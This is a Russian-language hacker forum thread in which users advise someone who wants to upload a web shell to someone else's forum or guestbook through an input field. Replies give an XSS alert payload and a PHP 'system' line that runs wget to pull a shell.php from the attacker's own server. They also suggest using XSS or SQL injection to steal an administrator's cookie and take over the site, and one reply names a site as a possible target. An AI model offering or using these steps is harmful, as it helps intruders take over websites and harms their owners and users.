Как залить шелл, если одно из полей для ввода (допустим на каком-нибудь форуме или гостевой) пропускает определённые символы (короче можно скрипты вставлять) ?
Ты неправельно понял (или я тебя). Скрипт ДОЛЖЕН загружать файлы. А если он пропускает какие-то символы, например при постинге сообщения в гостевой, то это тебе ничего не даёт, кроме xss||sql inj
Сморя какой там скрипт Возможно там есть php иньекция и ты не прав тогдаСсылку давай поглядим так на вскидку сказать не чего не могу.
не думаю что в жаба скрипте буит пхп инъекция))))))))))))) T-4 а ты введи <script>alert('Hacked by me!');</script> и наслаждайся=)
NaX[no]r† :: " Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил." =))))) вопрос читал не))) Как залить шелл? вот код на PHP <? system("cd ../../;wget http://...../shell.php"); ?> cd ../../ - папка куда залить.. wget - качалка. взависимости еcть ли он на серве.. может быть lynx и т.д. http://...../shell.php - твой сайт с php-шеллом А впринципе если *nux знаешь сам напишешь)))
2 [504] Про возможность выполнения команд на сервере тут ничего не говорилось, а говорилось тут о Вообщем к сабжу. Как не старайся, но если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать) Поэтому топикСтартеру советую рулить в сторону xss || sql inj, дабы заполучить "кусочек" админа, поставить себе этот кусочек и самому стать админом, а у админа больше прав, там уже и до шела не далеко
Ты бы ссылку дал мы бы конкретнее посоветовали... Действительно проще всего сейчас sql inj и какое нить поле создать(если то что ты хакаешь такое позволяет) чат php.sbp.ru например да...И всё...
